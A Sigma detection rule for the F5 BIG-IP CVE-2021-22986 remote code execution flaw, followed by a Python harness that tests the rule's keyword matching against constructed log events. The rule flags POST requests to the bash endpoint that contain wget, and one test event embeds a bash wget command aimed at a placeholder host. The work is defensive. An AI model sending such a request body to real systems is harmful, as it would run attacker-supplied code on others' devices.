CVE-2021-22986

Detection of CVE-2021-22986 observed from our Honeypots

Sigma rule

title: CVE-2021-22986
status: experimental
description: Detection of CVE-2021-22986 observed from our Honeypots
references:
  - https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html
author: Loginsoft Research Unit
date: 2021/06/15
logsource:
  product: F5 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO)
  category: Network Middleware Applications
detection:
  # POST request to the iControl REST endpoint that runs bash commands
  selection:
    c-uri: "/mgmt/tm/util/bash"
    cs-method: "POST"
  # Keywords are matched anywhere in the log event (here, the JSON request body)
  keywords1:
    - '"command": "run"'
  keywords2:
    - '"utilCmdArgs":"-c*'
  keywords3:
    - "wget"
  condition: selection and keywords1 and keywords2 and keywords3
level: high
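The following is an added example, not part of the original rule or Loginsoft's code: it evaluates the rule's condition against constructed log events to show that the keyword strings depend on the exact JSON spacing, and compares that with matching on the parsed body. The `body` field, the event names and the `example.invalid` host are assumptions made for the test data, and `rule_matches_parsed` narrows the `wget` check to `utilCmdArgs`, which the rule itself does not do.

```python
import json
import re

# Values copied from the rule above.
URI, METHOD = "/mgmt/tm/util/bash", "POST"
KEYWORDS = ['"command": "run"', '"utilCmdArgs":"-c*', "wget"]

def selection(event):
    return (event.get("c-uri", "").lower() == URI
            and event.get("cs-method", "").upper() == METHOD)

def keyword_hit(keyword, text):
    # Sigma keyword: case-insensitive substring match, '*' matches any run of characters.
    pattern = ".*".join(re.escape(part) for part in keyword.split("*"))
    return re.search(pattern, text, re.IGNORECASE | re.DOTALL) is not None

def rule_matches(event):
    # condition: selection and keywords1 and keywords2 and keywords3
    body = event.get("body", "")
    return selection(event) and all(keyword_hit(k, body) for k in KEYWORDS)

def rule_matches_parsed(event):
    # Same intent, evaluated on the parsed JSON body so key/value spacing is irrelevant.
    if not selection(event):
        return False
    try:
        body = json.loads(event.get("body", ""))
    except ValueError:
        return False
    if not isinstance(body, dict):
        return False
    args = str(body.get("utilCmdArgs", ""))
    return (body.get("command") == "run"
            and args.lstrip().startswith("-c")
            and "wget" in args.lower())

# Constructed sample events; "body" is an assumed field holding the logged request body.
CMD = "-c 'wget http://example.invalid/f'"
EVENTS = {
    "rule_spacing": {"c-uri": URI, "cs-method": "POST",
                     "body": '{"command": "run", "utilCmdArgs":"%s"}' % CMD},
    "uniform_spacing": {"c-uri": URI, "cs-method": "POST",
                        "body": '{"command": "run", "utilCmdArgs": "%s"}' % CMD},
    "compact": {"c-uri": URI, "cs-method": "POST",
                "body": '{"command":"run","utilCmdArgs":"%s"}' % CMD},
    "get_request": {"c-uri": URI, "cs-method": "GET", "body": ""},
}

if __name__ == "__main__":
    for name, event in EVENTS.items():
        print(name, rule_matches(event), rule_matches_parsed(event))
```

Only the event that reproduces the rule's mixed spacing satisfies the keyword form; normalizing or parsing the body before matching removes that dependency.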
